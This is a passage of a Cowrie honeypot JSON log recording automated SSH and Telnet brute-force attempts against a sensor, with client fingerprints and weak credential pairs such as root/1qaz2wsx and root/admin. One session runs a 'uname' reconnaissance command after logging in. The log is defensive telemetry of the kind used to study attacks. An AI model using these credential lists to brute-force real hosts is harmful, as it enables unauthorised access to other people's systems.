H client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T09:06:11.446469Z","src_ip":"51.79.164.132","session":"f1ec589bc3a6"}
{"eventid":"cowrie.login.failed","username":"es","password":"123456","message":"login attempt [es/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T09:06:12.567383Z","src_ip":"51.79.164.132","session":"f1ec589bc3a6"}
{"eventid":"cowrie.session.closed","duration":"3.5","message":"Connection lost after 3.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:06:14.052716Z","src_ip":"51.79.164.132","session":"f1ec589bc3a6"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":44662,"dst_ip":"1.2.3.4","dst_port":22,"session":"ce1273c7cad1","protocol":"ssh","message":"New connection: 185.93.89.7:44662 (1.2.3.4:22) [session: ce1273c7cad1]","sensor":"my-vps","timestamp":"2025-08-28T09:06:14.923907Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:06:14.925657Z","src_ip":"185.93.89.7","session":"ce1273c7cad1"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T09:06:14.943361Z","src_ip":"185.93.89.7","session":"ce1273c7cad1"}
{"eventid":"cowrie.login.failed","username":"index","password":"12345678","message":"login attempt [index/12345678] failed","sensor":"my-vps","timestamp":"2025-08-28T09:06:14.996142Z","src_ip":"185.93.89.7","session":"ce1273c7cad1"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:06:16.017781Z","src_ip":"185.93.89.7","session":"ce1273c7cad1"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":51852,"dst_ip":"1.2.3.4","dst_port":22,"session":"eb898686d02a","protocol":"ssh","message":"New connection: 51.79.164.132:51852 (1.2.3.4:22) [session: eb898686d02a]","sensor":"my-vps","timestamp":"2025-08-28T09:06:36.795238Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:06:36.899495Z","src_ip":"51.79.164.132","session":"eb898686d02a"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T09:06:37.222217Z","src_ip":"51.79.164.132","session":"eb898686d02a"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":54860,"dst_ip":"1.2.3.4","dst_port":22,"session":"1866a049b980","protocol":"ssh","message":"New connection: 185.93.89.7:54860 (1.2.3.4:22) [session: 1866a049b980]","sensor":"my-vps","timestamp":"2025-08-28T09:06:38.526577Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:06:38.527266Z","src_ip":"185.93.89.7","session":"1866a049b980"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T09:06:38.545114Z","src_ip":"185.93.89.7","session":"1866a049b980"}
{"eventid":"cowrie.login.failed","username":"index","password":"12345","message":"login attempt [index/12345] failed","sensor":"my-vps","timestamp":"2025-08-28T09:06:38.582745Z","src_ip":"185.93.89.7","session":"1866a049b980"}
{"eventid":"cowrie.login.failed","username":"root","password":"root","message":"login attempt [root/root] failed","sensor":"my-vps","timestamp":"2025-08-28T09:06:38.918043Z","src_ip":"51.79.164.132","session":"eb898686d02a"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:06:39.603203Z","src_ip":"185.93.89.7","session":"1866a049b980"}
{"eventid":"cowrie.session.closed","duration":"3.6","message":"Connection lost after 3.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:06:40.385285Z","src_ip":"51.79.164.132","session":"eb898686d02a"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":33604,"dst_ip":"1.2.3.4","dst_port":22,"session":"f83e9d87f9a9","protocol":"ssh","message":"New connection: 51.79.164.132:33604 (1.2.3.4:22) [session: f83e9d87f9a9]","sensor":"my-vps","timestamp":"2025-08-28T09:07:02.871475Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:07:03.044804Z","src_ip":"51.79.164.132","session":"f83e9d87f9a9"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T09:07:03.796076Z","src_ip":"51.79.164.132","session":"f83e9d87f9a9"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":37248,"dst_ip":"1.2.3.4","dst_port":22,"session":"975e0d0049ff","protocol":"ssh","message":"New connection: 185.93.89.7:37248 (1.2.3.4:22) [session: 975e0d0049ff]","sensor":"my-vps","timestamp":"2025-08-28T09:07:03.960037Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:07:04.014039Z","src_ip":"185.93.89.7","session":"975e0d0049ff"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T09:07:04.014755Z","src_ip":"185.93.89.7","session":"975e0d0049ff"}
{"eventid":"cowrie.login.failed","username":"index","password":"qwerty","message":"login attempt [index/qwerty] failed","sensor":"my-vps","timestamp":"2025-08-28T09:07:04.236813Z","src_ip":"185.93.89.7","session":"975e0d0049ff"}
{"eventid":"cowrie.login.failed","username":"user","password":"123","message":"login attempt [user/123] failed","sensor":"my-vps","timestamp":"2025-08-28T09:07:05.152882Z","src_ip":"51.79.164.132","session":"f83e9d87f9a9"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:07:05.341836Z","src_ip":"185.93.89.7","session":"975e0d0049ff"}
{"eventid":"cowrie.session.closed","duration":"3.7","message":"Connection lost after 3.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:07:06.598053Z","src_ip":"51.79.164.132","session":"f83e9d87f9a9"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":56996,"dst_ip":"1.2.3.4","dst_port":22,"session":"5a7010c56060","protocol":"ssh","message":"New connection: 51.79.164.132:56996 (1.2.3.4:22) [session: 5a7010c56060]","sensor":"my-vps","timestamp":"2025-08-28T09:07:29.026855Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:07:29.362290Z","src_ip":"51.79.164.132","session":"5a7010c56060"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T09:07:29.363200Z","src_ip":"51.79.164.132","session":"5a7010c56060"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":46640,"dst_ip":"1.2.3.4","dst_port":22,"session":"43fc5c3d01b7","protocol":"ssh","message":"New connection: 185.93.89.7:46640 (1.2.3.4:22) [session: 43fc5c3d01b7]","sensor":"my-vps","timestamp":"2025-08-28T09:07:30.447404Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:07:30.449094Z","src_ip":"185.93.89.7","session":"43fc5c3d01b7"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T09:07:30.467798Z","src_ip":"185.93.89.7","session":"43fc5c3d01b7"}
{"eventid":"cowrie.login.failed","username":"index","password":"123123","message":"login attempt [index/123123] failed","sensor":"my-vps","timestamp":"2025-08-28T09:07:30.564954Z","src_ip":"185.93.89.7","session":"43fc5c3d01b7"}
{"eventid":"cowrie.login.success","username":"root","password":"1qaz2wsx","message":"login attempt [root/1qaz2wsx] succeeded","sensor":"my-vps","timestamp":"2025-08-28T09:07:31.175499Z","src_ip":"51.79.164.132","session":"5a7010c56060"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:07:31.609995Z","src_ip":"185.93.89.7","session":"43fc5c3d01b7"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T09:07:32.424304Z","src_ip":"51.79.164.132","session":"5a7010c56060"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T09:07:32.425080Z","src_ip":"51.79.164.132","session":"5a7010c56060"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:07:32.744725Z","src_ip":"51.79.164.132","session":"5a7010c56060"}
{"eventid":"cowrie.session.closed","duration":"3.7","message":"Connection lost after 3.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:07:32.745989Z","src_ip":"51.79.164.132","session":"5a7010c56060"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":36500,"dst_ip":"1.2.3.4","dst_port":23,"session":"040b118b7645","protocol":"telnet","message":"New connection: 212.227.125.160:36500 (1.2.3.4:23) [session: 040b118b7645]","sensor":"my-vps","timestamp":"2025-08-28T09:07:38.601908Z"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-08-28T09:07:38.685569Z","src_ip":"212.227.125.160","session":"040b118b7645"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T09:07:39.135051Z","src_ip":"212.227.125.160","session":"040b118b7645"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":54152,"dst_ip":"1.2.3.4","dst_port":22,"session":"1fab32510e4d","protocol":"ssh","message":"New connection: 185.93.89.7:54152 (1.2.3.4:22) [session: 1fab32510e4d]","sensor":"my-vps","timestamp":"2025-08-28T09:07:54.293724Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:07:54.294836Z","src_ip":"185.93.89.7","session":"1fab32510e4d"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T09:07:54.313976Z","src_ip":"185.93.89.7","session":"1fab32510e4d"}
{"eventid":"cowrie.login.failed","username":"index","password":"111111","message":"login attempt [index/111111] failed","sensor":"my-vps","timestamp":"2025-08-28T09:07:54.358753Z","src_ip":"185.93.89.7","session":"1fab32510e4d"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":56932,"dst_ip":"1.2.3.4","dst_port":22,"session":"3be91b53a1b0","protocol":"ssh","message":"New connection: 51.79.164.132:56932 (1.2.3.4:22) [session: 3be91b53a1b0]","sensor":"my-vps","timestamp":"2025-08-28T09:07:54.711691Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:07:54.958841Z","src_ip":"51.79.164.132","session":"3be91b53a1b0"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp